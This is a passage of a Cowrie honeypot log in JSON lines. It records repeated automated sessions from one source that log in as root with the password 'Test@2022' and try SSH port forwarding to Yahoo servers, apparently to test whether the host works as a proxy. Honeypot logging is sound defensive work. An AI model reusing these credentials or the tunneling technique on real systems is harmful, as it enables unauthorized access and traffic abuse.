6-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.503145Z","src_ip":"213.209.150.239","session":"5bc1bf0406d6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.785685Z","src_ip":"213.209.150.239","session":"5bc1bf0406d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":202,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:202","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.843389Z","session":"5bc1bf0406d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.900114Z","src_ip":"213.209.150.239","session":"5bc1bf0406d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":1492,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:1492","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.055083Z","session":"5bc1bf0406d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.111763Z","src_ip":"213.209.150.239","session":"5bc1bf0406d6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.169339Z","src_ip":"213.209.150.239","session":"5bc1bf0406d6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31508,"dst_ip":"1.2.3.4","dst_port":22,"session":"390e5d1b3ca9","protocol":"ssh","message":"New connection: 213.209.150.239:31508 (1.2.3.4:22) [session: 390e5d1b3ca9]","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.225102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.225778Z","src_ip":"213.209.150.239","session":"390e5d1b3ca9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.282783Z","src_ip":"213.209.150.239","session":"390e5d1b3ca9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.565481Z","src_ip":"213.209.150.239","session":"390e5d1b3ca9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":7657,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:7657","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.624149Z","session":"390e5d1b3ca9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.681091Z","src_ip":"213.209.150.239","session":"390e5d1b3ca9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":11214,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:11214","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.835062Z","session":"390e5d1b3ca9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.891851Z","src_ip":"213.209.150.239","session":"390e5d1b3ca9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.949138Z","src_ip":"213.209.150.239","session":"390e5d1b3ca9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31619,"dst_ip":"1.2.3.4","dst_port":22,"session":"72ad6aeb0dcb","protocol":"ssh","message":"New connection: 213.209.150.239:31619 (1.2.3.4:22) [session: 72ad6aeb0dcb]","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.995165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:30.996067Z","src_ip":"213.209.150.239","session":"72ad6aeb0dcb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:31.042936Z","src_ip":"213.209.150.239","session":"72ad6aeb0dcb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:31.277210Z","src_ip":"213.209.150.239","session":"72ad6aeb0dcb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":8087,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:8087","sensor":"my-vps","timestamp":"2025-08-26T01:04:31.325171Z","session":"72ad6aeb0dcb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:31.372514Z","src_ip":"213.209.150.239","session":"72ad6aeb0dcb"}
{"eventid":"cowrie.session.connect","src_ip":"138.19.27.144","src_port":37361,"dst_ip":"1.2.3.4","dst_port":23,"session":"add615d901ed","protocol":"telnet","message":"New connection: 138.19.27.144:37361 (1.2.3.4:23) [session: add615d901ed]","sensor":"my-vps","timestamp":"2025-08-26T01:04:31.508001Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":15057,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:15057","sensor":"my-vps","timestamp":"2025-08-26T01:04:31.509195Z","session":"72ad6aeb0dcb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:31.556197Z","src_ip":"213.209.150.239","session":"72ad6aeb0dcb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:31.603979Z","src_ip":"213.209.150.239","session":"72ad6aeb0dcb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31699,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b87d38cfac1","protocol":"ssh","message":"New connection: 213.209.150.239:31699 (1.2.3.4:22) [session: 2b87d38cfac1]","sensor":"my-vps","timestamp":"2025-08-26T01:04:31.650134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:31.660079Z","src_ip":"213.209.150.239","session":"2b87d38cfac1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:31.697359Z","src_ip":"213.209.150.239","session":"2b87d38cfac1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:31.931459Z","src_ip":"213.209.150.239","session":"2b87d38cfac1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":17133,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:17133","sensor":"my-vps","timestamp":"2025-08-26T01:04:31.979893Z","session":"2b87d38cfac1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.027429Z","src_ip":"213.209.150.239","session":"2b87d38cfac1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":31727,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:31727","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.169436Z","session":"2b87d38cfac1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.216510Z","src_ip":"213.209.150.239","session":"2b87d38cfac1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.264412Z","src_ip":"213.209.150.239","session":"2b87d38cfac1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31748,"dst_ip":"1.2.3.4","dst_port":22,"session":"844a818090d4","protocol":"ssh","message":"New connection: 213.209.150.239:31748 (1.2.3.4:22) [session: 844a818090d4]","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.310824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.311917Z","src_ip":"213.209.150.239","session":"844a818090d4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.358989Z","src_ip":"213.209.150.239","session":"844a818090d4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.593945Z","src_ip":"213.209.150.239","session":"844a818090d4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":21940,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:21940","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.642807Z","session":"844a818090d4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.689938Z","src_ip":"213.209.150.239","session":"844a818090d4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":18506,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:18506","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.825513Z","session":"844a818090d4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.872754Z","src_ip":"213.209.150.239","session":"844a818090d4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.920589Z","src_ip":"213.209.150.239","session":"844a818090d4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31788,"dst_ip":"1.2.3.4","dst_port":22,"session":"5affcc37bc5b","protocol":"ssh","message":"New connection: 213.209.150.239:31788 (1.2.3.4:22) [session: 5affcc37bc5b]","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.966852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:32.967692Z","src_ip":"213.209.150.239","session":"5affcc37bc5b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:33.014951Z","src_ip":"213.209.150.239","session":"5affcc37bc5b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:33.249958Z","src_ip":"213.209.150.239","session":"5affcc37bc5b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":50,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:50","sensor":"my-vps","timestamp":"2025-08-26T01:04:33.298103Z","session":"5affcc37bc5b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:33.345472Z","src_ip":"213.209.150.239","session":"5affcc37bc5b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":16772,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:16772","sensor":"my-vps","timestamp":"2025-08-26T01:04:33.481616Z","session":"5affcc37bc5b"}
